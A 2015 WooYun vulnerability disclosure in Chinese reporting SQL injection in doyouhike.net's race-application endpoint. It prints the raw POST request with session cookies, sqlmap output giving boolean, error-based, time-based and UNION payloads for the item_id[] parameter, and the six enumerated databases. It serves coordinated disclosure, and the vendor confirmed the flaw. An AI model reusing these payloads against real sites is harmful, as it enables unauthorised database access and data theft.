当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129919

漏洞标题:磨房网SQL注入(6库)

相关厂商:doyouhike.net

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-28 14:51

修复时间:2015-09-11 19:32

公开时间:2015-09-11 19:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述:

1

详细说明:

POST /race/races/apply/228 HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.doyouhike.net:80/
Cookie: PHPSESSID=uoofv3pje83gcolufsiuhkvv82; dyh_lastactivity=1438056935; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a679b5af1ff1cd20a55a43fc6f43c843%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22120.195.159.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1438056634%3B%7D6a16e4a1bbe5941fcd220f4c007b4b63; dicc_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aeb97d17cc43a03c3a30e268f82ab1c8%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22118.252.10.148%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1438056787%3B%7Dd373e9310f2b37bb4fb250d9f3b9dff9
Host: www.doyouhike.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
item_id%5b%5d=1


0.png


POST parameter 'item_id[]' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requ
ests:
---
Parameter: item_id[] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: item_id[]=1') AND 7518=7518 AND ('ygSN'='ygSN
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: item_id[]=1') AND (SELECT 8106 FROM(SELECT COUNT(*),CONCAT(0x717170
6a71,(SELECT (ELT(8106=8106,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATIO
N_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('RXOm'='RXOm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: item_id[]=1') AND (SELECT * FROM (SELECT(SLEEP(5)))cvgt) AND ('QzCs
'='QzCs
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: item_id[]=1') UNION ALL SELECT CONCAT(0x7171706a71,0x4f62616c6b7373
585954,0x71717a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[12:27:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 7
back-end DBMS: MySQL 5.0
[12:27:34] [INFO] fetching database names
available databases [6]:
[*] ezaitu_dive_fin
[*] ezaitu_jhapi_dev
[*] ezaitu_race
[*] ezaitu_wiki
[*] ezaitu_yizhan
[*] information_schema
[12:27:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 28 times
[12:27:34] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.doyouhike.net'
[*] shutting down at 12:27:34


1.png


2.png


3.png


4.png


5.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-28 19:30

厂商回复:

参数过滤不当,感谢

最新状态:

暂无